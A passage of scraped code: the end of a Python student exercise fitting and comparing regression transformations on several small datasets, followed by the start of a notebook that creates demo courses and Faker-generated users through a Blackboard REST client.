line\r\nplt.scatter(np.log(data.weight),data.calories)\r\nplt.plot(np.log(data.weight), pred2, 'r')\r\nplt.legend(['Predicted line', 'Observed data'])\r\nplt.show()\r\n\r\n## error calculation\r\nres2 = data.calories - pred2\r\nres_sqr2 = (res2 * res2)\r\nmse2 = np.mean(res_sqr2)\r\nrmse2 = np.sqrt(mse2)\r\nrmse2 # we have an error 253.55\r\n\r\n## exponential transformation\r\n# x = weight; y = log(calories)\r\nplt.scatter(x = data['weight'], y = np.log(data['calories']), color = 'orange')\r\nnp.corrcoef(data.calories, data.weight)\r\n\r\nmodel3 = smf.ols('np.log(calories)~weight',data = data).fit()\r\nmodel3.summary()\r\n\r\npred3 = model3.predict(pd.DataFrame(data['weight']))\r\npred3_at = np.exp(pred3)\r\npred3_at\r\n\r\n## regression line\r\nplt.scatter(data.weight, np.log(data.calories))\r\nplt.plot(data.weight, pred3, 'r')\r\nplt.legend(['Predicted line', 'Observed data'])\r\nplt.show()\r\n\r\n## error calculation\r\nrse3 = data.calories - pred3_at\r\nrse_sqr3 = (rse3 * rse3)\r\nmse3 = np.mean(rse_sqr3)\r\nrmse3 = np.sqrt(mse3)\r\nrmse3 ### 272.420\r\n\r\n#### polynomial transformations\r\n## x = weight; x^2 =(weight * weight); y = log(calories)\r\nmodel4 = smf.ols('np.log(calories) ~ weight+I(weight*weight)',data = data).fit()\r\nmodel4.summary()\r\npred4 = model4.predict(pd.DataFrame(data))\r\npred4_at = np.exp(pred4)\r\npred4_at\r\n\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly_reg = PolynomialFeatures(degree = 2)\r\nx = 
data.iloc[:, 0:1].values\r\nx_poly = poly_reg.fit_transform(x)\r\nx_poly\r\n\r\nplt.scatter(data.weight, np.log(data.calories))\r\nplt.plot(x, pred4, color = 'green')\r\nplt.legend('Predicted line','Observed data')\r\nplt.show()\r\n\r\n### error calculation\r\nrse4 = data.calories- pred4_at\r\nrse_sqr4 = (rse4 * rse4)\r\nmse4 = np.mean(rse_sqr4)\r\nrmse4 = np.sqrt(mse4)\r\nrmse4\r\n\r\n## for choosing best model\r\nnew_data = {'model':pd.Series([\"SLR\",\"log model\",\"exp model\",\"poly model\"]),\"RMSE\":pd.Series([rmse1,rmse2,rmse3,rmse4])}\r\ntable_rmse = pd.DataFrame(new_data)\r\ntable_rmse\r\n\r\n############################## the best model\r\nfrom sklearn.model_selection import train_test_split\r\ntrain,test = train_test_split(data, test_size = 0.2)\r\n\r\nfinal_model = smf.ols('calories~weight',data= train).fit()\r\nfinal_model.summary()\r\n\r\n## predict on test_data\r\ntest_pred = final_model.predict(pd.DataFrame(test))\r\npred_test_calories = np.exp(test_pred)\r\npred_test_calories\r\n\r\n#### model evaluation on test data\r\ntest_res = test.calories- pred_test_calories\r\ntest_sqrs = (test_res * test_res)\r\ntest_mse = np.mean(test_sqrs)\r\ntest_rmse = np.sqrt(test_mse)\r\ntest_rmse\r\n\r\n### prediction on train data\r\ntrain_pred = final_model.predict(pd.DataFrame(train))\r\npred_train_calories = np.exp(train_pred)\r\npred_train_calories\r\n\r\n##### model evaluation on train data\r\ntrain_res = train.calories - pred_train_calories\r\ntrain_sqrs = (train_res * train_res)\r\ntrain_mse = np.mean(train_sqrs)\r\ntrain_rmse = np.sqrt(train_mse)\r\ntrain_rmse\r\n\r\n\r\n\r\n# 2. A food delivery service recorded the data of delivery time taken and\r\n# the time taken for the deliveries to be sorted by the restaurants in \r\n# order to improve their delivery services. Approach – \r\n# A Simple Linear regression model needs to be built with target\r\n #variable ‘Delivery.Time’. Apply necessary transformations and\r\n #record the RMSE values, Correlation coefficient values for different \r\n #transformation models. 
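# A small helper along these lines would avoid recomputing the error metric
# by hand for every transformation below (an illustrative sketch, not in the
# original; `np` inside the body resolves at call time via the numpy import
# that follows):
def rmse(actual, predicted):
    return np.sqrt(np.mean((actual - predicted) ** 2))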
\r\n \r\nimport pandas as pd\r\nimport numpy as np\r\nmy_data = pd.read_csv('~/documents/delivery_time.csv')\r\nmy_data\r\nmy_data.describe()\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.boxplot(my_data)\r\nplt.boxplot(my_data.delivery)\r\nplt.boxplot(my_data.sorting)\r\n\r\nplt.scatter(x = my_data.delivery, y = my_data.sorting, color = \"black\")\r\nplt.hist(my_data.delivery)\r\nplt.hist(my_data.sorting)\r\n\r\nimport statsmodels.api as sm\r\nsm.qqplot(my_data.delivery)\r\nsm.qqplot(my_data.sorting)\r\n ##### by observing the above plots we can say that data is normally distributed\r\n ## coorelation \r\nnp.corrcoef(my_data.delivery, my_data.sorting)\r\n\r\n# covariation\r\ncov_vr = np.cov(my_data.delivery, my_data.sorting)\r\ncov_vr\r\n\r\n### model building\r\nimport statsmodels.formula.api as smf\r\n\r\nmod1 = smf.ols(\"delivery~sorting\",data = my_data).fit()\r\nmod1.summary()\r\npred1 = mod1.predict(pd.DataFrame(my_data['sorting']))\r\n\r\n### regression line\r\nplt.scatter(my_data.sorting, my_data.delivery)\r\nplt.plot(my_data.sorting, pred1,\"r\")\r\nplt.legend(\"Predicted line\", \"Observed data\")\r\nplt.show()\r\n\r\n## error calculation \r\nrse1 = my_data.delivery - pred1\r\nrse_sqr1 = (rse1 * rse1)\r\nmse1 = np.mean(rse_sqr1)\r\nrmse1 = np.sqrt(mse1)\r\nrmse1 #### 2.79\r\n\r\n### model building on transformed data\r\n## x = log(sorting); y = delivery\r\nplt.scatter(x = my_data.delivery, y = np.log(my_data.sorting))\r\nnp.corrcoef(my_data.delivery, np.log(my_data.sorting))\r\n\r\n\r\nmod2 = smf.ols(\"delivery~np.log(sorting)\",data = my_data).fit()\r\nmod2.summary()\r\npred2 = mod2.predict(pd.DataFrame(my_data[\"sorting\"]))\r\n### regression line\r\nplt.scatter(np.log(my_data.sorting),my_data.delivery)\r\nplt.plot(np.log(my_data.sorting),pred2, \"r\")\r\nplt.legend(\"Predicted line\",\"Observed data\")\r\nplt.show()\r\n\r\n### error calculation\r\nrse2 = np.log(my_data.sorting) - pred2\r\nrse_sqr2 = (rse2 * rse2)\r\nmse2 = np.mean(rse_sqr2)\r\nrmse2 = np.sqrt(mse2)\r\nrmse2 ### 4.63\r\n\r\n### model building on exponential transformations\r\n# x = sorting ; y = log(delivery)\r\nplt.scatter(x = my_data.sorting, y = np.log(my_data.delivery))\r\nnp.corrcoef(my_data.sorting, y = np.log(my_data.delivery))\r\n\r\nmod3 = smf.ols(\"np.log(delivery)~sorting\",data = my_data).fit()\r\nmod3.summary()\r\npred3 = mod3.predict(pd.DataFrame(my_data['sorting']))\r\npred3_at = np.exp(pred3)\r\npred3_at\r\n\r\n### regression line\r\nplt.scatter(my_data.sorting, np.log(my_data.delivery))\r\nplt.plot(my_data.sorting, pred3, \"r\")\r\nplt.legend('Predicted line',\"Observed data\")\r\nplt.show()\r\n\r\n### error calculation\r\nrse3 = my_data.delivery - pred3_at\r\nrse_sqr3 = (rse3 * rse3)\r\nmse3 = np.mean(rse_sqr3)\r\nrmse3 = np.sqrt(mse3)\r\nrmse3 ### 2.94\r\n\r\n##### polynomial transformation\r\n## x = sorting; x^2 = (sorting*sorting); y = log(delivery)\r\nmod4 = smf.ols(\"np.log(delivery) ~ sorting + I(sorting*sorting)\",data = my_data).fit()\r\nmod4.summary()\r\n\r\npred4 = mod4.predict(pd.DataFrame(my_data))\r\npred4_at = np.exp(pred4)\r\npred4_at\r\n\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly_reg = PolynomialFeatures(degree = 2)\r\nx = my_data.iloc[:, 0:1].values\r\nx_poly = poly_reg.fit_transform(x)\r\n\r\nplt.scatter(my_data.sorting, np.log(my_data.delivery))\r\nplt.plot(x, pred4, \"r\")\r\nplt.legend('Predicted line', 'Observed data')\r\nplt.show()\r\n\r\n## error calculation\r\nrse4 = my_data.delivery - pred4_at\r\nrse_sqr4 = (rse4 * rse4)\r\nmse4 = 
np.mean(rse_sqr4)\r\nrmse4 = np.sqrt(mse4)\r\nrmse4\r\n\r\n#### choosing best model\r\nend_data = {\"Model\": pd.Series([\"SLR\",\"log model\", \"exponential\",\"poly\"]), \"RMSE\": pd.Series([rmse1, rmse2, rmse3, rmse4])}\r\ntable_rmse = pd.DataFrame(end_data)\r\ntable_rmse\r\n\r\n### the best model\r\nfrom sklearn.model_selection import train_test_split\r\n\r\ntrain,test = train_test_split(my_data, test_size = 0.2)\r\nfinalmodel = smf.ols('delivery~sorting',data = my_data).fit()\r\nfinalmodel.summary()\r\n\r\n## predict on test data\r\ntest_pred = finalmodel.predict(pd.DataFrame(test))\r\npred_test_delivery = np.exp(test_pred)\r\npred_test_delivery\r\n\r\n### model evaluation on test data\r\ntest_rse = test.delivery - test_pred\r\ntest_rse_sqr = (test_rse * test_rse)\r\ntest_mse = np.mean(test_rse_sqr)\r\ntest_rmse = np.sqrt(test_mse)\r\ntest_rmse ## 1.5\r\n\r\n## prediction on train data\r\ntrain_pred = finalmodel.predict(pd.DataFrame(train))\r\npred_train_del = np.exp(train_pred)\r\npred_train_del\r\n\r\n## model evaluation train data\r\ntrain_rse = train.delivery - train_pred\r\ntrain_rse_sqr = (train_rse * train_rse)\r\ntrain_mse = np.mean(train_rse_sqr)\r\ntrain_rmse = np.sqrt(train_mse)\r\ntrain_rmse # 3.08\r\n\r\n\r\n#3.) A certain organization wanted an early estimate of their employee\r\n#churn out rate. So, the HR department came up with data regarding the \r\n#employee’s salary hike and churn out rate for a financial year.\r\n#The analytics team will have to perform a deep analysis and predict an\r\n#estimate of employee churn and present the statistics. Approach\r\n#–A Simple Linear regression model needs to be built with target variable\r\n#‘Churn_out_rate’. Apply necessary transformations and record the RMSE values\r\n#, Correlation coefficient values for different transformation.\r\n\r\nimport pandas as pd \r\nimport numpy as np\r\n\r\ninfo = pd.read_csv('~/documents/emp_data.csv')\r\ninfo\r\ninfo.describe()\r\ninfo.mean()\r\ninfo.median()\r\ninfo.mode()\r\ninfo.std()\r\ninfo.var()\r\ninfo.skew()\r\ninfo.kurt()\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\n### constructing boxplot for finding outliers\r\nplt.boxplot(info)\r\nplt.boxplot(info.salary)\r\nplt.boxplot(info.churn) ## we have no outliers\r\n\r\n### check the data is normally distributed or not\r\nimport statsmodels.api as sm\r\n\r\nsm.qqplot(info.salary)\r\nsm.qqplot(info.churn)\r\n\r\n## histogram\r\nplt.hist(info.salary)## right skewed\r\nplt.hist(info.churn)## right skewed distribution\r\n\r\n### Barchart\r\nplt.bar(height = info.salary, x= np.arange(1,11,1))\r\nplt.bar(height = info.churn, x= np.arange(1,11,1))\r\n\r\n## scatter plot\r\nplt.scatter(x = info['salary'], y = info['churn'], color = 'red')\r\n\r\n### correlation\r\nnp.corrcoef(info.salary, info.churn)\r\n\r\n## covariance\r\ncov_var = np.cov(info.salary,info.churn)\r\ncov_var\r\n\r\nimport statsmodels.formula.api as smf\r\nmodel1 = smf.ols('churn~salary',data= info).fit()\r\nmodel1.summary()\r\npred1 = model1.predict(pd.DataFrame(info['salary']))\r\n\r\n## regression line\r\nplt.scatter(info.salary, info.churn)\r\nplt.plot(info.salary, pred1, 'r')\r\nplt.legend('Predicted line', 'Observed data')\r\nplt.show()\r\n\r\n## error calculation\r\nrse1 = info.churn - pred1\r\nrse_sqr = (rse1 * rse1)\r\nmse1 = np.mean(rse_sqr)\r\nrmse1 = np.sqrt(mse1)\r\nrmse1 ## 3.997\r\n\r\n##### model building on log transformed data\r\n# x = log(salary); y = churn\r\nmodel2 = smf.ols('churn~np.log(salary)',data = info).fit()\r\nmodel2.summary()\r\n\r\npred2 = 
model2.predict(pd.DataFrame(info['salary']))\r\n\r\n### regression line\r\nplt.scatter(np.log(info.salary), info.churn)\r\nplt.plot(np.log(info.salary), pred2, 'r')\r\nplt.legend('Predicted line', 'Observed data')\r\nplt.show()\r\n\r\n### error calculation\r\nrse2 = info.churn - pred2\r\nrse_sqr2 = (rse2 * rse2)\r\nmse2 = np.mean(rse_sqr2)\r\nrmse2 = np.sqrt(mse2)\r\nrmse2 ### 3.786\r\n\r\n### model building on exponential data\r\n# x = salary; y = log(churn)\r\nmodel3 = smf.ols('np.log(churn)~salary',data = info).fit()\r\nmodel3.summary()\r\npred3 = model3.predict(pd.DataFrame(info['salary']))\r\npred3_at = np.exp(pred3)\r\npred3_at\r\n\r\n### regression line\r\nplt.scatter(info.salary, np.log(info.churn))\r\nplt.plot(info.salary, pred3, 'r')\r\nplt.legend('Predicted line', 'Observed data')\r\nplt.show()\r\n\r\n##### Error calculation\r\nrse3 = info.churn - pred3_at\r\nrse_sqr3 = (rse3 * rse3)\r\nmse3 = np.mean(rse_sqr3)\r\nrmse3 = np.sqrt(mse3)\r\nrmse3 #### 3.541\r\n\r\n### model building on polynomial transformation\r\n## x = salary+I(salary * salary); y = log(churn)\r\n\r\nmodel4 = smf.ols('np.log(churn)~salary+I(salary * salary)',data = info).fit()\r\nmodel4.summary()\r\n\r\npred4 = model4.predict(pd.DataFrame(info))\r\npred4_at = np.exp(pred4)\r\npred4_at\r\n\r\n### regression line\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly_reg = PolynomialFeatures(degree = 2)\r\nx = info.iloc[:,0:1].values\r\nx_poly = poly_reg.fit_transform(x)\r\n\r\n### regression line\r\nplt.scatter(info.salary, np.log(info.churn))\r\nplt.plot(x, pred4, 'r')\r\nplt.legend('Predicted line', 'Observed data')\r\nplt.show()\r\n\r\n## Error calculation \r\nrse4 = info.churn - pred4_at\r\nrse_sqr4 = (rse4 * rse4)\r\nmse4 = np.mean(rse_sqr4)\r\nrmse4 = np.sqrt(mse4)\r\nrmse4 #### 1.326\r\n\r\n##### choose the best model using rmse\r\nend_info = {\"Model\": ['SLR', 'log','exp','poly'], \"RMSe\": [rmse1, rmse2, rmse3, rmse4]}\r\ntable_rmse = pd.DataFrame(end_info)\r\ntable_rmse\r\n\r\n##### The best model is polynomial model having rmse as 1.326\r\nfrom sklearn.model_selection import train_test_split\r\ntrain,test = train_test_split(info, test_size = 0.2)\r\n\r\nfinalmodel = smf.ols('np.log(info.churn)~salary+I(salary*salary)',data = info).fit()\r\nfinalmodel.summary()\r\n\r\n### prediction on test data\r\ntest_pred = finalmodel.predict(pd.DataFrame(test))\r\ntest_pred_c = np.exp(test_pred)\r\ntest_pred_c\r\n\r\n### model evaluation\r\ntest_rse = test.churn - test_pred_c\r\ntest_rse_sqr = (test_rse * test_rse)\r\ntest_mse = np.mean(test_rse_sqr)\r\ntest_rmse = np.sqrt(test_mse)\r\ntest_rmse #### 1.050\r\n\r\n### prediction on train data\r\ntrain_pred = finalmodel.predict(pd.DataFrame(train))\r\ntrain_pred_c = np.exp(train_pred)\r\ntrain_pred_c\r\n\r\n##### model evaluation \r\ntrain_rse = train.churn - train_pred_c\r\ntrain_rse_sqr = (train_rse * train_rse)\r\ntrain_mse = np.mean(train_rse_sqr)\r\ntrain_rmse = np.sqrt(train_mse)\r\ntrain_rmse ### 1.387\r\n\r\n\r\n# 4.) The Head HR of a certain organization wants to automate their salary hike \r\n#estimation. The organization consulted an analytics service provider and \r\n#asked them to build a basic prediction model by providing them with a sample \r\n#data that contains historic data of the years of experience and the salary \r\n#hike given accordingly over the past years. 
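# Editor's note (hedged): the 'best model' above is refit on the full frame
# (data = info) even though train/test were just split; fitting on the train
# split avoids scoring the model on rows it has already seen:
# finalmodel = smf.ols('np.log(churn)~salary+I(salary*salary)', data=train).fit()
# (Patsy resolves bare column names from `data`, so 'np.log(churn)' is the
# conventional form rather than 'np.log(info.churn)'.)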
Approach - A Simple Linear \r\n#regression model needs to be built with target variable ‘Salary’ to predict \r\n#the salary hikeapply necessary transformations and record the RMSE values, \r\n#Correlation coefficient values for different transformation models.\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\ndata = pd.read_csv('~/documents/Salary_Data.csv')\r\ndata\r\ndata.columns\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\n#### finding outliers\r\nplt.boxplot(data.YearsExperience)\r\nplt.boxplot(data.Salary)\r\n\r\n### check distribution of data\r\nimport statsmodels.api as sm\r\nsm.qqplot(data.YearsExperience)\r\nsm.qqplot(data.Salary)\r\n\r\n## histogram\r\nplt.hist(data.YearsExperience)\r\nplt.hist(data.Salary)\r\n\r\n## barchart\r\nplt.bar(height = data.YearsExperience, x = np.arange(1,31,1))\r\nplt.bar(height = data.Salary, x = np.arange(1,31,1))\r\n\r\n### scatter plot\r\nplt.scatter(data.YearsExperience, data.Salary)\r\n\r\n### correlation\r\nnp.corrcoef(data.YearsExperience, data.Salary)\r\n\r\n## covariance\r\nco_var = np.cov(data.YearsExperience, data.Salary)\r\nco_var\r\n\r\nimport statsmodels.formula.api as smf\r\nm1 = smf.ols('Salary~YearsExperience',data = data).fit()\r\nm1.summary()\r\n\r\np1 = m1.predict(pd.DataFrame(data['YearsExperience']))\r\n\r\n#### regression line\r\nplt.scatter(data.YearsExperience, data.Salary)\r\nplt.plot(data['YearsExperience'], p1, 'r')\r\nplt.legend('Predicted line', 'Observed data')\r\nplt.show()\r\n\r\n### Error calculation\r\nrse1 = data.Salary - p1\r\nrse_sqr1 = (rse1 * rse1)\r\nmse1 = np.mean(rse_sqr1)\r\nrmse1 = np.sqrt(mse1)\r\nrmse1 ### 5592.043\r\n\r\n#### build log transformation model\r\n# x =log(YearsExperience); y = Salary\r\nm2 = smf.ols('Salary~np.log(YearsExperience)', data = data).fit()\r\nm2.summary()\r\n\r\np2 = m2.predict(pd.DataFrame(data['YearsExperience']))\r\n\r\n### Regression line\r\nplt.scatter(np.log(data.YearsExperience), data.Salary)\r\nplt.plot(np.log(data.YearsExperience),p2, 'r')\r\nplt.legend('Predicted line', 'Observed data')\r\nplt.show()\r\n\r\n#### Error calculation\r\nrse2 = data.Salary - p2\r\nrse_sqr2 = (rse2 * rse2)\r\nmse2 = np.mean(rse_sqr2)\r\nrmse2 = np.sqrt(mse2)\r\nrmse2\r\n\r\n### build exponential transformation model\r\nm3 = smf.ols('np.log(data.Salary)~YearsExperience', data = data).fit()\r\nm3.summary()\r\n\r\np3 = m3.predict(pd.DataFrame(data['YearsExperience']))\r\n\r\n##### regression line\r\nplt.scatter(data.YearsExperience, np.log(data.Salary))\r\nplt.plot(data.YearsExperience,p3, 'r')\r\nplt.legend('Predicted line', 'Observed data')\r\nplt.show()\r\n\r\n### error calculation\r\nrse3 = data.Salary - p3\r\nrse_sqr3 = (rse3 * rse3)\r\nmse3 = np.mean(rse_sqr3)\r\nrmse3 = np.sqrt(mse3)\r\nrmse3### 80630.25750\r\n\r\n#### building model on polynomial transformantions\r\n## y = np.log(Salary); x = YearsExperience; x^2 = (YearsExperience * YearsExperience)\r\nm4 = smf.ols('np.log(data.Salary)~YearsExperience+I(YearsExperience*YearsExperience)',data = data).fit()\r\n\r\n\r\np4 = m4.predict(pd.DataFrame(data))\r\np4_at = np.exp(p4)\r\np4_at\r\n\r\n### Regression line\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\n\r\npoly_reg = PolynomialFeatures(degree = 2)\r\nx = data.iloc[:,0:1].values\r\nx_poly = poly_reg.fit_transform(x)\r\n\r\nplt.scatter(data.YearsExperience, data.Salary)\r\nplt.plot(x, p4, 'r')\r\nplt.legend('Predicted line', 'Observed data')\r\nplt.show()\r\n\r\n#### Error calculation\r\nrse4 = data.Salary - p4\r\nrse_sqr4 = (rse4 * rse4)\r\nmse4 = 
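# Editor's note (hedged): p3 and p4 above are on the log scale (both models
# target np.log(Salary)), so residuals against the raw salaries should use the
# back-transformed predictions -- this is why rmse3 (~80630) dwarfs the other
# models:
# rse3 = data.Salary - np.exp(p3)
# rse4 = data.Salary - p4_at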
np.mean(rse_sqr4)\r\nrmse4 = np.sqrt(mse4)\r\nrmse4\r\n\r\n### choosing best model\r\ndata_final = {\"MODEL\":pd.Series([\"SLR\", \"Log model\", \"Exp model\", \"Poly model\"]), \"RMSE\":pd.Series([rmse1, rmse2, rmse3, rmse4])}\r\ntable_rmse = pd.DataFrame(data_final)\r\ntable_rmse\r\n\r\n##### the best model\r\nfrom sklearn.model_selection import train_test_split\r\ntrain, test = train_test_split(data, test_size = 0.2)\r\n\r\nbest_model = smf.ols('Salary~YearsExperience',data = train).fit()\r\nbest_model.summary()\r\n\r\n### prediction on test data\r\npred_test = best_model.predict(pd.DataFrame(test))\r\npred_test_sal = np.exp(pred_test)\r\npred_test_sal\r\n\r\n### Model evaluation on test data\r\ntest_rse = test.Salary - pred_test_sal\r\ntest_rse_sqr = (test_rse * test_rse)\r\ntest_mse = np.mean(test_rse_sqr)\r\ntest_rmse = np.sqrt(test_mse)\r\ntest_rmse\r\n\r\n#### prediction on train data\r\npred_train = best_model.predict(pd.DataFrame(train))\r\npred_train_sal = np.exp(pred_train)\r\npred_train_sal\r\n\r\n#### model evaluation on train data\r\nt_rse = train.Salary - pred_train_sal\r\nt_rse_sqr = (t_rse * t_rse)\r\nt_mse = np.mean(t_rse_sqr)\r\nt_rmse = np.sqrt(t_mse)\r\nt_rmse\r\n\r\n\r\n#A student from a certain University was asked to prepare a dataset and build\r\n# a prediction model for predicting SAT scores based on the exam giver’s GPA. \r\n#Approach - A regression model needs to be built with target variable \r\n#‘SAT_Scores’and record the RMSE values, Correlation coefficient values for \r\n#different transformation models.\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nmydata = pd.read_csv('~/documents/SAT_GPA.csv')\r\nmydata\r\nmydata.describe()\r\n\r\nimport matplotlib.pyplot as plt\r\n## boxplot\r\nplt.boxplot(mydata.sat)## no outliers\r\nplt.boxplot(mydata.gpa) ## we have no outliers\r\n\r\n### bar chart\r\nplt.bar(height = mydata.sat, x = np.arange(1,201,1))\r\nplt.bar(height = mydata.gpa, x = np.arange(1,201,1))\r\n\r\n## histogram\r\nplt.hist(mydata.sat)\r\nplt.hist(mydata.gpa)\r\n\r\n### scatter plot\r\nplt.scatter(mydata.sat, mydata.gpa)\r\n\r\n#### lets draw qqplots to check the data normally distributed or not\r\nimport statsmodels.api as sm\r\nsm.qqplot(mydata.sat)\r\nsm.qqplot(mydata.gpa)\r\n\r\n### corrrelation\r\nnp.corrcoef(mydata.sat, mydata.gpa)\r\n\r\n## covariance\r\nco_var = np.cov(mydata.sat, mydata.gpa)\r\nco_var\r\n\r\n### build model using transformations\r\nimport statsmodels.formula.api as smf\r\n\r\nm1 = smf.ols('sat~gpa',data = mydata).fit()\r\nm1.summary()\r\n\r\np1 = m1.predict(pd.DataFrame(mydata['gpa']))\r\n\r\n## Regression line\r\nplt.scatter(mydata.gpa, mydata.sat)\r\nplt.plot(mydata.gpa, p1, 'r')\r\nplt.legend('Predicted line','Observed data')\r\nplt.show()\r\n\r\n#### Error calculation\r\nr = mydata.sat - p1\r\nr_sqr = (r * r)\r\nmse = np.mean(r_sqr)\r\nrmse1 = np.sqrt(mse)\r\nrmse1 ### 166.770\r\n\r\n### using log transformations\r\n# y = sat; x = log(gpa)\r\nm2 = smf.ols('sat~np.log(gpa)', data = mydata).fit()\r\nm2.summary()\r\n\r\np2 = m2.predict(pd.DataFrame(mydata['gpa']))\r\n\r\n### regression line\r\nplt.scatter(np.log(mydata.gpa), mydata.sat)\r\nplt.plot(np.log(mydata.gpa),p2, 'r')\r\nplt.legend('Predicted line', 'Observed data')\r\nplt.show()\r\n\r\n### error calculation\r\nr2 = mydata.sat - p2\r\nr_sqr2 = (r * r)\r\nmse2 = np.mean(r_sqr2)\r\nrmse2 = np.sqrt(mse2)\r\nrmse2 \r\n\r\n### using exponential method\r\n# y = log(sat); x = gpa\r\nm3 = smf.ols('np.log(sat)~gpa',data = mydata).fit()\r\nm3.summary()\r\n\r\np3 = 
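# Editor's note (hedged): two slips in the SAT section above are worth
# flagging. First, r_sqr2 squares the SLR residuals (r * r) instead of the log
# model's (r2 * r2), so rmse2 merely repeats rmse1. Second, as before, np.exp()
# on predictions is only needed for log-target models; the Salary 'best model'
# above already predicts on the raw scale (the same applies to the SAT model
# chosen below).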
m3.predict(pd.DataFrame(mydata['gpa']))\r\np3_at = np.exp(p3)\r\np3_at\r\n\r\n## Regression line\r\nplt.scatter(mydata.gpa, np.log(mydata.sat))\r\nplt.plot(mydata.gpa, p3, 'r')\r\nplt.legend('Predicted line','Observed data')\r\nplt.show()\r\n\r\n### ERROR CALCULATION\r\nrse3 = mydata.sat - p3\r\nrse_sqr3 = (rse3 * rse3)\r\nmse3 = np.mean(rse_sqr3)\r\nrmse3 = np.sqrt(mse3)\r\nrmse3 ### 516.0534\r\n\r\n### polynomial transformation\r\n# y = log(sat); x = gpa; x^2 = (gpa * gpa)\r\nm4 = smf.ols('np.log(sat)~gpa+I(gpa*gpa)', data = mydata).fit()\r\nm4.summary()\r\n\r\np4 = m4.predict(pd.DataFrame(mydata))\r\np4_at = np.exp(p4)\r\np4_at\r\n\r\n### Regression line\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly_reg = PolynomialFeatures(degree = 2)\r\nx = mydata.iloc[:, 0:1].values\r\nx_ploy = poly_reg.fit_transform(x)\r\n\r\nplt.scatter(mydata.gpa, np.log(mydata.sat))\r\nplt.plot(x, p4, 'r')\r\nplt.legend('Predicted line', 'Observed data')\r\nplt.show()\r\n\r\n### error calculation\r\nrse4 = mydata.sat - p4_at\r\nrse_sqr4 = (rse4 * rse4)\r\nmse4 = np.mean(rse_sqr4)\r\nrmse4 = np.sqrt(mse4)\r\nrmse4\r\n\r\n### choosing best model\r\nfinaldata = {\"Model\":pd.Series(['slr','log','exp','poly']), \"RMSE\":pd.Series([rmse1, rmse2, rmse3, rmse4])}\r\ntable_rmse = pd.DataFrame(finaldata)\r\ntable_rmse\r\n\r\n### the best model\r\nbest_mod = smf.ols('sat~gpa',data = mydata).fit()\r\nbest_mod.summary()\r\n\r\n## prediction on test data\r\n\r\nfrom sklearn.model_selection import train_test_split\r\ntrain, test = train_test_split(mydata, test_size = 0.2)\r\n\r\npred_test = best_mod.predict(pd.DataFrame(test))\r\npred_test_sat = np.exp(pred_test)\r\npred_test_sat\r\n\r\n### Model evaluation on test data\r\ntest_rse = mydata.sat - pred_test_sat\r\ntest_rse_sqr = (test_rse * test_rse)\r\ntest_mse = np.mean(test_rse_sqr)\r\ntest_rmse = np.sqrt(test_mse)\r\ntest_rmse\r\n\r\n### predction on train data\r\npred_train = best_mod.predict(pd.DataFrame(train))\r\npred_train_sat = np.exp(pred_train)\r\npred_train_sat\r\n\r\n### Model evaluation on test data\r\nt_rse = mydata.sat - pred_train_sat\r\nt_rse_sqr = (t_rse * t_rse)\r\nt_mse = np.mean(t_rse_sqr)\r\ntrain_rmse = np.sqrt(t_mse)\r\ntrain_rmse\r\n","repo_name":"Quickcoder1/DataScience","sub_path":"linear regression.py","file_name":"linear regression.py","file_ext":"py","file_size_in_byte":24047,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"20056833057","text":"#%% [markdown]\n# # System Administrators\n# ## Setup : this should seem familiar\n\n#%%\nfrom dotenv import load_dotenv\nfrom os import getenv\nfrom faker import Faker\nfake = Faker()\nimport random\n\nif load_dotenv():\n key, secret, url = getenv('key'), getenv('secret'), getenv('url')\n try:\n assert key, \"Key not loaded\"\n assert secret, \"Secret not loaded\"\n assert url, \"Url not loaded\"\n print(\"All environment variables loaded successfully\")\n except AssertionError as e:\n print(e)\n print(\"Ensure your .env file has url, key and secret\")\nelse:\n print('Make sure you have a .env file')\n\n\n#%%\nfrom bbrest import BbRest\nbb = BbRest(key, secret, url)\n\n#%% [markdown]\n# # Three Use Cases:\n# \n# * 1. Creating fake users, three fake courses, and fake memberships. \n# * 2. Getting a users last accessed courses \n# * 3. Disabling and enabling a course and user. \n#%% [markdown]\n# ## Creating Fake Users, Courses and Memberships\n#%% [markdown]\n# ### Creating Fake Courses\n# We are going to create 3 fake courses. 
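#%%
# Editor's note (hedged): in the SAT evaluation just above, test residuals are
# taken against the full column (mydata.sat) instead of the held-out split
# (test.sat / train.sat), so the Series do not align row-for-row.
# For the notebook below, the BbRest calls are assumed to return
# requests.Response objects (hence .status_code / .json()); a tiny guard makes
# the happy path explicit:
def created_ok(resp, what):
    if resp.status_code == 201:
        print(f'Created {what}')
        return True
    print(f'Not created: {what} -> {resp.text}')
    return False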
Since we are only creating a handful, we will enter the information manually.\n\n#%%\nr = bb.CreateCourse(payload={'name':'DevCon-Demo1','courseId':'NAC-DevCon1'})\nprint(r.json())\n\n\n#%%\nr1 = bb.CreateCourse(payload={'name':'DevCon-Demo2','courseId':'NAC-DevCon2'})\nr2 = bb.CreateCourse(payload={'name':'DevCon-Demo3','courseId':'NAC-DevCon3'})\n\nprint(r1.status_code)\nprint(r2.status_code)\n\n#%% [markdown]\n# ### Creating Fake Users\n# For this, we are going to create 50 users with the help from the libary 'faker'. Faker generates random names / addresses / passwords ... basically all user info needed for this use case.\n\n#%%\nstudents = []\nfor _ in range(50):\n name = fake.name()\n while len(name.split()) > 2:\n name = fake.name()\n names = name.split() \n first = names[0]\n last = names[-1]\n userName = f'{first[0]}{last}{fake.random_number(digits=3)}'.lower()\n studentId = fake.random_number(digits=9,fix_len=True)\n email = f'{userName}@ku.edu'\n password = fake.password()\n \n student = {'name':{'family': last, 'given': first},\n 'userName': userName,\n 'password': password,\n 'studentId': studentId,\n 'externalId': studentId,\n 'contact': {'email':email}\n }\n \n \n r = bb.CreateUser(payload=student)\n \n if r.status_code == 201:\n print(f'Created account for {name}')\n students.append(student)\n else:\n print(r.text)\n print(f'Account not created for {name}')\n\n#%% [markdown]\n# ### Creating Fake Memberships\n# We are going to add my account as an instructor in these three courses, and the students each into one of the three courses.\n\n#%%\ncourses = 